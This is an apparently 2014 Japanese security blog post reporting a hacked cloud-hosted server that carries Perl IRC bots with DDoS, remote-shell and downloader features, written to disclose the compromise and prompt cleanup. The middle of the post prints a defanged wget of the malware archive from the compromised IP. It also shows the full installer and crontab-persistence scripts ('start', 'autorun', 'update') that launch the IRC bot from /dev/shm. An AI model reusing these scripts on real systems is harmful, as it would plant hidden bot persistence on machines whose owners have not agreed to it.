金曜日, 2月 21, 2014

#OCJP-125: とある某国内クラウドサービスが感染(ハッキング)された

実は本件の報告は下記のツイートした時にやっていました↓


今日仕事@電車の移動でパート確認したら、ハッキングツールが未だ残っていて、さらに、つい最近OpenSSHも入れられたそうです。今日迄そろそろ10日間立ちますが管理者は全然未だ気づいて無いみたいですね…では、ここで報告しますよ。

今回さくっとビデオを撮ります↓見ながら以下の説明をご覧下さい。


マルウェア的にツイートしたの物はPerl/IRC-Botで、ハッキングツールです。種類はトロイ・バックドアですね。
色んな機能を持ち、HTTPプロキシ機能、IRCサーバのリモート接続機能(Bot)、ポートスキャナー、UDP+DCCのDDoS機能、と「BackConnect」っていうリモート管理環境です。証拠としてコードをそのままで引っ張りましたので、ここで安全な環境で見れます。(コードを壊したので動かない状況で、見るだけの為)

"web.is"と"bot"といファイルは上記のbotです。

それだけですか? いや、/icon/の中に未だ色々があります。。。


ダイレクトリーの中に"bug"と"lol"というファイルもありますので、



…別のBOTです。機能的にもっとあります、例えば…IGMP,ICMP,TCPのDDoS Flood攻撃機能(!危険!)、リモートShell実行環境(!危険!)、その他ハッキングツールのダウンローダ(!危険!)、マルシプルOSの対応ですね。
証拠としてコードをそのままで引っ張りましたので、ここで安全な環境で見れます。

次、別の似たようなbotもありますが、"xdat"と"xdatt"っていうファイルです。同じPerl Shell Botハッキングツールですね↓

証拠確認の為、安全な環境でコードを見たいならこちらです。

これから大事な情報ですが、このホストにある悪い物は他のハッキングされたホストからダウンロードが出来るスクリプトもあります。
下記はそのスクリプトです…

↑上記のコード綺麗に書くと、ハッカーのやり方を見えます。対策の為この情報を知っていた方がいいと思います。


では、この10日間でこのホストからどのぐらいハッキングツールを配ったのか?

後その他の2点もあります。。。

この/icon/のダイレクトリーにもこういうファイルがあります↓


適当にダウンロードした…
$ wget hxxp://121.119. 182.119/icons/x.tgz
--2014-02-21 18:00:31--  http://121.119. 182.119/icons/x.tgz
Connecting to 121.119. 182.119:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 376065 (367K) [application/x-gzip]
Saving to: 'x.tgz'
100%[=================>] 376,065      427KB/s   in 0.9s
2014-02-21 18:00:32 (427 KB/s) - 'x.tgz' saved [376065/376065]
そして…展開したら…
$ date
Fri Feb 21 18:01:45 JST 2014
$ tar -xzvf ./x.tgz
x .x/
x .x/mech.dir
x .x/vhosts
x .x/m.help
x .x/update
x .x/bash
x .x/m.lev
x .x/cron.d
x .x/inst
x .x/run
x .x/r/
x .x/r/rsignoff.e
x .x/r/rkicks.e
x .x/r/rtsay.e
x .x/r/rnicks.e
x .x/r/raway.e
x .x/r/rpickup.e
x .x/r/rversions.e
x .x/r/rsay.e
x .x/r/rinsult.e
x .x/autorun
x .x/LinkEvents
x .x/start
$
「start」というファイルはインストーラーっぽいで、中身を見よう↓
$ date
Fri Feb 21 18:09:03 JST 2014
$
$ cat start
#!/bin/bash

if [ $# != 1 ]; then
                echo "Tasteaza : ./start canal "
        echo "P.S : fara diez!"
        exit;
fi


/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "######Multi Emech on Undernet######"
echo "#####     bil #N.A.S.A.       #####"
echo "%%%%%%%% 真??Undernet !!!    %%%%%%"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1

while read line; do
   ./inst $1 $line

case "$D" in
"1")
echo -e "\b\.\c"
D=2
;;
"2")
echo -e "\b\..\c"
D=3
;;
"3")
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bDone"
./autorun
./run
$
そして「start」がコールした「autorun」↓
$ date
Fri Feb 21 18:10:25 JST 2014
$
$ cat autorun
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update
$
そして…「update」↓
$ date
Fri Feb 21 18:11:25 JST 2014
$
$ cat update
#!/bin/sh
if test -r /dev/shm/.x/m.pid; then
pid=$(cat /dev/shm/.x/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /dev/shm/.x
./run &>/dev/null
$
で、最期に「run」は↓
$ date
Fri Feb 21 18:12:17 JST 2014
$
$ cat run
#!/bin/sh
export PATH=.
bash
$
などなどなファイルもありますがIRCボットの関係です。 ここ迄見るとこのホストがIRC経由で色々悪用されますね。

最期にハッカーはOpenSSHをこのダイレクトリーに入れたみたいですね。。このホストが完璧にやられたなぁ。。。 まー、結構やられたなので、本当に早く直してほしい。。。 このホストはIPしか分からないので、一応ISPのabuseに報告を送ったけれど(10日間前に)未だアクションが無いですね。。 とりあえず、もし手伝う事が出来るなら、本件のクリーニング手続き又は報告を責任者にお願い致します。 ISP↓

inetnum:        121.119.179.0 - 121.119.182.255
netname:        GMOHS-DS
descr:          GMO CLOUD K.K.
country:        JP
admin-c:        JP00014991
tech-c:         JP00014991
回線↓
inetnum:        121.112.0.0 - 121.119.255.255
netname:        OCN
descr:          NTT Communications Corporation
descr:          1-6 Uchisaiwai-cho 1-chome Chiyoda-ku, Tokyo 100-8019 Japan
country:        JP

0 件のコメント:

コメントを投稿